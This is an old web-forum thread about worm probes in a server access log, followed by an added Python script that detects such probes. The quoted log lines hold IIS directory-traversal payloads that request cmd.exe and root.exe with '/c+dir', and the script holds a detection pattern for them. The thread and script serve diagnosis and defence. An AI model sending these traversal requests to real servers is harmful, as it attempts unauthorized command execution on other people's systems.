
Yikes - Access Log?


This topic is 8163 days old. Please don't post here. Open a new topic instead.


I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log? I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event.

203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372

203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368

203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424


Those hits are from an internet worm, either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are coming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this.

Good luck,

Martin


Thanks Martin. I am running WebSTAR on an old Mac, and connecting to FM5U thru the FMWSC. Does any of that afford me protection? How do other folks deal with this? I read some posts about blocking access to those IPs but that seems futile given the volume.
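Added example, not part of any post in this thread: a small Python triage script for an access log like the excerpt above. It counts requests for `cmd.exe` or `root.exe` per source address and lists any that the server answered with something other than an error. It assumes Common Log Format as in the excerpt; the function names are hypothetical and the last two sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$')
# Windows binaries requested by the probes quoted in the thread
TARGETS = re.compile(r'(?:^|[\\/])(?:cmd|root)\.exe$', re.I)

def normalize(path, rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash becomes visible."""
    for _ in range(rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path

def is_probe(request_path):
    """True when the path (query string dropped) ends in cmd.exe or root.exe."""
    return bool(TARGETS.search(normalize(request_path.split("?", 1)[0])))

def triage(lines):
    """Map source IP -> probe count and the probe paths not answered with an error."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m or not is_probe(m.group(4)):
            continue
        ip, status = m.group(1), int(m.group(5))
        report[ip]["probes"] += 1
        if status < 400:  # a 404 means the file was not there; anything else needs a look
            report[ip]["served"].append(m.group(4))
    return dict(report)

# First three lines are from the post above; the last two are constructed.
SAMPLE = [
    '203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372',
    '203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416',
    '203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424',
    '192.0.2.10 - - [15/Dec/2001:08:00:00 -0600] "GET /index.html HTTP/1.0" 200 5120',
    '198.51.100.7 - - [15/Dec/2001:08:01:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, info in triage(SAMPLE).items():
        print(ip, info["probes"], "probes;", len(info["served"]), "not rejected")
```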
